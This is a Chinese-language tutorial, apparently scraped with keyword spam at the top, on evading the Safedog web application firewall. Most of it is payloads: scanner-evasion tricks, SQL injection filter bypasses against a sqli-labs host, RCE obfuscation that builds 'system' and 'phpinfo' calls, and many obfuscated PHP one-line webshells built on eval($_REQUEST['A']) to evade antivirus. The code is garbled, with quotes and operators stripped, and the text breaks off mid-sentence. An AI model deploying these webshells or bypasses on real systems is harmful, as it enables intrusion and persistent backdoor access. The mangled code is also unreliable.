大悟网站建设,企业信息查询app哪个最好,手机网站二级导航菜单,建站之星官网引言#xff1a; 所有的绕过原理都大致一致#xff0c;但是并不是所有的绕过都能起到作用#xff0c;渗透测试主要还是一个猜加试的过程#xff0c;本文仅供参考 网络攻击或扫描绕过
1.get绕过#xff08;未开启cc防护#xff09; 网络安全狗的默认防护为#xff0c;拒…引言 所有的绕过原理都大致一致但是并不是所有的绕过都能起到作用渗透测试主要还是一个猜加试的过程本文仅供参考 网络攻击或扫描绕过
1.get绕过未开启cc防护 网络安全狗的默认防护为拒绝head请求在扫描工具中大部分使用head请求去收集目录信息所以改用get请求绕过 2.cc防护绕过 cc防护和检测流量攻击的原理相同同一ip并发数过多对其进行禁用 1延迟绕过限制扫描速率 2爬虫引擎更换User-Agent头
Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Baiduspider-render/2.0; http://www.baidu.com/search/spider.html) sql注入绕过
sql内联注释绕过针对MySQL mysql为了兼容其他数据将mysql的特有语句放入/*!100441 */其他数据库不执行但在mysql中正常执行 //被拦截
http://192.168.10.111/sqli-labs/Less-1/?id2 and 11
//成功注入
http://192.168.10.111/sqli-labs/Less-1/?id2 /*!10441and*/ 12 --
特殊符号绕过 %0a:为换行 %23为# 192.168.10.111/sqli-labs/Less-1/?id2 --/*%0a and 12 union select 1,2,3%23*/
-- 最后展现在sql中的语句为
--/*
and 12 union select 1,2,3 #*/
HPP参数污染针对apache
因为apach接收数据时允许同名数据并且最后一个数据为有效值所以只有第最后一个参数后的语句有效
192.168.10.111/sqli-labs/Less-1/?id2 /*id2 and 12 union select 1,database(),3 %23*/ RCE绕过
变量拼接绕过
waf对某些特殊字符串进行检测时可以使用
//如果对phpinfo检测可以把参数改为
$aphp;$binfo;$c$a.$b;$c();
编码绕过
assert(base64_decode(cGhwaW5mbygpOw));
字符替换绕过
assert(str_replace(x,,sxyxsxtxexm(ipconfig)));
传参绕过
urlrce_eval.php?strtem
$bsys;$c$_GET[str];$a$b.$c;$a(ipconfig);
后渗透绕过木马免杀
waf中eval和$_REQUEST同时出现时会被拦截
end免杀 end函数取数组最后一个元素 eval(end($_REQUEST[A]));
define免杀
define(b,$_REQUEST[A]);
eval(b); 拼接免杀
$aev;
$bal;
$c$a.$b;
$dc;
$$d($_REQUEST[A]);
//等价于eval($_REQUEST[A]);
函数免杀
function abc($b){returb $b;
}
$a abc($_REQUEST[A]);
eval($a);
类定义绕过
class user{$name;function __construct($name){$this-name$name;}function __destruct(){eval($this-name);}
}
$anew user($_REQUEST[A]);
cookie绕过
$cookie $_COOKIE;
foreach($cookie as $key $value){if($keyeval){$key($_REQUEST[A]);}
}
预定义函数绕过
$defun $get_define_functions();
//使用defun获取assert
$defun[internal][841]($_REQUEST[A]);
编码绕过
eval(base64_decode(JF9SRVFVRVNUWydBJ10));
并不是所有方式都是有用 对于pc防火墙免杀如 火绒、360也可以使用相同的思路
对于火绒免杀有效的方法